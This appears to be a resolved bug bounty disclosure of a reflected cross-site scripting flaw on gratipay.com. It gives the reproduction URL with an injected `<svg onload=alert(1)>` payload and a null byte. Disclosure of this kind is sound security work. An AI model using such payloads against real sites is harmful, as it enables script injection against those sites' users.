Reflected XSS - gratipay.com
Medium
G
Gratipay
Submitted None
Actions:
Reported by
tungpun
Vulnerability Details
Technical details and impact analysis
# Summary
I would like to report a Reflected XSS on gratipay.com.
# Browsers Verified In
* Firefox 55.0.2 (up to date)
# Steps To Reproduce
Goto this URL:
`https://gratipay.com/on/npm/cx%00A<svg onload=alert(1)>`
{F215426}
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-site Scripting (XSS) - Reflected